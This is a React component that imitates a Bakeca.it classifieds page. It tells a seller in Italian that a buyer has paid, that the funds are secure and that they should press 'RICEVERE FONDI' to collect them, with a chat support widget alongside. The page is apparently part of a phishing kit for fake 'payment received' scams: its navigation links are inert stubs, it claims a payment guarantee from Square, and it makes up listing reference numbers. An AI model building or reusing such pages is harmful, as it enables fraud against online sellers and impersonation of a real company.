import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BakecaItSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/bakeca-it-logo.svg`;

function noopLink(e) {
  e.preventDefault();
}

function BakecaFooter() {
  const col = (title, links) => (
    <div className="bk-footer-col">
      <h4 className="bk-footer-col-title">{title}</h4>
      {links.map(([label]) => (
        <a key={label} href="#/" className="bk-footer-link" onClick={noopLink}>
          {label}
        </a>
      ))}
    </div>
  );

  return (
    <footer className="bk-footer">
      <div className="bk-footer-cols">
        {col('BAKECA', [
          ['Chi siamo'],
          ['Lavora con noi'],
          ['Codice etico'],
        ])}
        {col('SERVIZI', [
          ['Inserisci annuncio'],
          ['Gestione annunci'],
          ['Crea il tuo alert'],
          ['Gestione alert'],
        ])}
        {col('ASSISTENZA', [
          ['Domande frequenti'],
          ['Regole di pubblicazione'],
          ['Consigli antitruffa'],
          ['Privacy'],
          ['Uso dei cookie'],
          ["Termini e condizioni d'uso"],
          ['Contattaci'],
          ['Aggiorna le impostazioni di tracciamento della pubblicità'],
        ])}
        {col('PUBBLICITÀ', [
          ['Bakeca Business'],
          ['Campagna banner'],
          ['Annunci sponsorizzati'],
          ['Direct email marketing'],
          ['Toplist'],
          ['Tutte le vetrine'],
        ])}
      </div>
      <div className="bk-footer-social" aria-hidden>
        <span className="bk-soc">f</span>
        <span className="bk-soc">◎</span>
        <span className="bk-soc">𝕏</span>
        <span className="bk-soc">in</span>
        <span className="bk-soc">♪</span>
        <span className="bk-soc">▶</span>
      </div>
      <p className="bk-footer-copy">© 2026 Bakeca S.r.l. - P.IVA 09239540017</p>
    </footer>
  );
}

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function listingRef(pageData, pageCode) {
  const pn = (pageData?.product_name || '').trim().replace(/\s+/g, '');
  if (/^\d+$/.test(pn)) return pn;
  const pc = pageCode || pageData?.page_code || '';
  if (!pc) return '—';
  let h = 0;
  for (let i = 0; i < pc.length; i += 1) h = (h * 33 + pc.charCodeAt(i)) >>> 0;
  return String(10000 + (h % 90000));
}

function ShieldCheckIcon() {
  return (
    <svg className="bk-shield" viewBox="0 0 48 48" fill="none" aria-hidden>
      <path
        d="M24 4L8 10v12c0 8.5 6.2 16.4 16 18 9.8-1.6 16-9.5 16-18V10L24 4z"
        fill="#f39200"
      />
      <path
        d="M17 24l5 5 10-12"
        stroke="#fff"
        strokeWidth="3"
        strokeLinecap="round"
        strokeLinejoin="round"
      />
    </svg>
  );
}

function BakecaItSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [imgFailed, setImgFailed] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'IT').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;

  const photoUrl = resolvePhotoUrl(pageData?.photo_url || '');
  const productTitle = (pageData?.product_name || '').trim();
  const initials = productTitle ? productTitle.slice(0, 2).toUpperCase() : 'B';

  const refDisplay = useMemo(
    () => listingRef(pageData, pageCode || pageData?.page_code || ''),
    [pageData, pageCode],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="bk-wrap">
        <div className="bk-loading">Caricamento…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="bk-wrap">
      <header className="bk-header">
        <div className="bk-header-inner">
          <a href="#/" className="bk-logo" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="Bakeca.it" decoding="async" />
          </a>
          <a href="#/" className="bk-btn-insert" onClick={(e) => e.preventDefault()}>
            + INSERISCI ANNUNCIO
          </a>
        </div>
      </header>

      <main className="bk-main">
        <div className="bk-main-inner">
          <div className="bk-grid">
            <div className="bk-card-left">
              <div className="bk-media">
                {photoUrl && !imgFailed ? (
                  <img src={photoUrl} alt="" onError={() => setImgFailed(true)} />
                ) : (
                  <span className="bk-media-ph" aria-hidden>{initials}</span>
                )}
              </div>
              <p className="bk-ref">{refDisplay}</p>
              <p className="bk-price">{amountDisplay}</p>
              <div className="bk-status">
                <ShieldCheckIcon />
                <p>
                  L&apos;acquirente ha pagato il tuo prodotto. I fondi sono al sicuro. Procedi a
                  riscuoterli.
                </p>
              </div>
            </div>

            <aside className="bk-aside">
              <h1 className="bk-aside-title">Il prodotto è stato acquistato</h1>
              <div className="bk-info-box">
                <h3>Transazioni sicure</h3>
                <p>
                  Tutti i pagamenti su Bakeca sono protetti e crittografati. Il servizio è garantito
                  dal nostro partner Square, con la tecnologia necessaria per verificare i fondi
                  inviati e ricevuti.
                </p>
                <h3>Il nostro supporto</h3>
                <p>
                  Puoi contattarci 24 ore su 24 e ricevere una risposta entro 24 ore. Il team
                  esamina ogni segnalazione e dà priorità a problemi di prelievo o ricezione del
                  denaro. Contatta uno specialista via chat per la risposta più rapida.
                </p>
              </div>
              <Link to={index2Path} className="bk-cta">
                RICEVERE FONDI
              </Link>
            </aside>
          </div>
        </div>
      </main>

      <div className="bk-footer-wrap">
        <BakecaFooter />
      </div>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default BakecaItSuccess;
